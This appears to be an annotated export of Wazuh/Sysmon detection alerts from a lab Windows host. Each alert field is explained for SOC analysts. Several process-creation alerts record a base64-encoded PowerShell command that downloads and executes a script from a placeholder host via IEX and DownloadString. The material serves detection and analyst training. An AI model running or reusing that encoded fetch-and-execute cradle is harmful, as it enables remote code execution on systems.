Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:25.4788727Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284577
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:25.438 ProcessGuid: {94294ddc-bd5f-680a-740b-000000000e00} ProcessId: 16016 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_tvke0fdg.nch.ps1 CreationUtcTime: 2025-04-24 22:38:25.438 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:25.438
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd5f-680a-740b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16016
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tvke0fdg.nch.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:25.438
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:30.562+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:30.562+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  71
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534310.1628617
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:27.9090694Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284623
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:26.606 ProcessGuid: {94294ddc-bd62-680a-760b-000000000e00} ProcessId: 16188 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd5f-680a-740b-000000000e00} ParentProcessId: 16016 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:26.606
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd62-680a-760b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16188
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd5f-680a-740b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16016
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:30.567+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:30.567+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  75
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534310.1636688
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:28.2206040Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284624
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:28.201 ProcessGuid: {94294ddc-bd62-680a-760b-000000000e00} ProcessId: 16188 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zwznofro.2cu.ps1 CreationUtcTime: 2025-04-24 22:38:28.201 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:28.201
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd62-680a-760b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16188
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zwznofro.2cu.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:28.201
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:33.795+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:33.795+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  72
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534313.1639457
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:31.9272596Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284660
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:29.313 ProcessGuid: {94294ddc-bd65-680a-780b-000000000e00} ProcessId: 16300 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd62-680a-760b-000000000e00} ParentProcessId: 16188 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:29.313
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd65-680a-780b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16300
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd62-680a-760b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16188
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:34.742+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:34.742+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  76
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534314.1647528
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

